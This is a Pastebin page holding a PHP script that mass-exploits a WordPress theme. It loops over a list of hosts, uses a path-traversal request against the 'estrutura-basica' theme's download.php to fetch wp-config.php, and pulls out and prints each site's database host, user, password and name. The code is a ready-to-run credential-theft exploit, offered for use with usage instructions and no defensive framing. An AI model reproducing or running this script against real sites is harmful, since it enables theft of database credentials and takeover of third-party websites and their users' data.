Advertisement
Evoo

WPLFI

Nov 19th, 2015
385
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.08 KB | None | 0 0
  1. <?php
  2. /*
  3. How To Usage This Script
  4. c:\root\php>php this.php list.txt
  5. */
  6.  @error_reporting(0);
  7. @set_time_limit(0);
  8. print "
  9. Thx To CodersLeet - IndoXploit
  10. " ;
  11.  
  12.  
  13. $g=@file_get_contents($argv[1]);
  14. $ss=explode("\r\n",$g);
  15. $open=fopen("result.html","a");
  16.  
  17.  
  18. foreach ($ss as $links){
  19.   $lofe="http://$links/wp-content/themes/estrutura-basica/scripts/download.php?arquivo=../../wp-config.php";
  20.   $gg=@file_get_contents($lofe);
  21.   if(preg_match("#<?php#",$gg)){
  22.      echo "\n[+] $links ==> infected\n";
  23.  
  24.      preg_match ("#define\('DB_HOST', '(.*?)'\);#i", $gg, $f);
  25.      echo "\t\t[!] DB_HOST : ". $f[1]. "\n";
  26.  
  27.         preg_match ("#define\('DB_USER', '(.*?)'\);#i", $gg, $f) ;
  28.         echo "\t\t[!] DB_USER : ". $f[1]. "\n";
  29.  
  30.         preg_match ("#define\('DB_PASSWORD', '(.*?)'\);#i", $gg, $f)  ;
  31.         echo "\t\t[!] DB_PASSWORD : ". $f[1]. "\n";
  32.  
  33.         preg_match ("#define\('DB_NAME', '(.*?)'\);#i", $gg, $f) ;
  34.         echo "\t\t[!] DB_NAME : ". $f[1]. "\n";
  35.   }else{
  36.     echo "\n[+] $links ==> Not infected\n";
  37.   }
  38. }
  39. fclose($open);
  40. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement